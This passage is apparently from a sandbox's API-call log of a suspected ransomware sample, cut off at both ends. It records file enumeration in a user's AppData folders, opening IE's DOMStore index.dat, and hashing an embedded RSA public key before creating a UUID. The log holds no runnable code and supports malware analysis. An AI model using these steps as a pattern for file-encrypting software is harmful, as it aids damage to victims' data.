cAlternateFileName="C46E7B~2")) returned 1 [0098.071] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned="" [0098.071] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.071] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x682fbd00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x682fbd00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae0bca00, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", cAlternateFileName="C46E7B~3")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5461c2f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5461c2f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf67eb30, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", cAlternateFileName="C46E7B~1")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x728c68a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x728c68a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xae63dce0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", cAlternateFileName="D47DBD~2")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x545f6190, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x545f6190, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69b6e1e0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE", cAlternateFileName="D47DBD~1")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D47DBD2F9E3365FBBE008D71FB06716F_D33192D58AA9CA2B9097E848E9FE86DE") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x1a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3150248 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0098.072] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0098.072] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0098.072] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0xfc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0098.073] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0098.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0098.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x311eb98 | out: hHeap=0x680000) returned 1 [0098.073] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0098.073] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0098.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0098.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0098.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0098.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0098.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0098.073] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0098.073] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0098.073] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.073] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0098.073] PathFindFileNameW (pszPath="") returned="" [0098.074] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned=".dat" [0098.074] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0098.074] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=32768) returned 1 [0098.074] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0098.078] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x7fda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.078] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0098.079] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.079] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x8000, lpOverlapped=0x0) returned 1 [0098.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.080] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0098.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.080] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.080] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0098.081] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0098.081] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.081] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0098.081] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0098.081] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0098.081] GetLastError () returned 0x0 [0098.082] CryptDestroyHash (hHash=0x31c7580) returned 1 [0098.082] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0098.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0098.082] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0098.082] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.082] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0098.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8000) returned 0x9a06a00 [0098.082] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.082] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbd58 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50c0 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fbda0 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50d8 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5108 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.082] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0098.083] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5108 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e5120 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e5108 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x3191bd8 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0098.083] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5120 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e5108 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.083] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0098.084] GetCurrentThreadId () returned 0x8c4 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99faa90 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.084] GetCurrentThreadId () returned 0x8c4 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0098.084] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.084] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5108 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e5120 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0098.085] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0098.085] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e50f0 [0098.085] HeapFree (in: hHeap=0x680000, 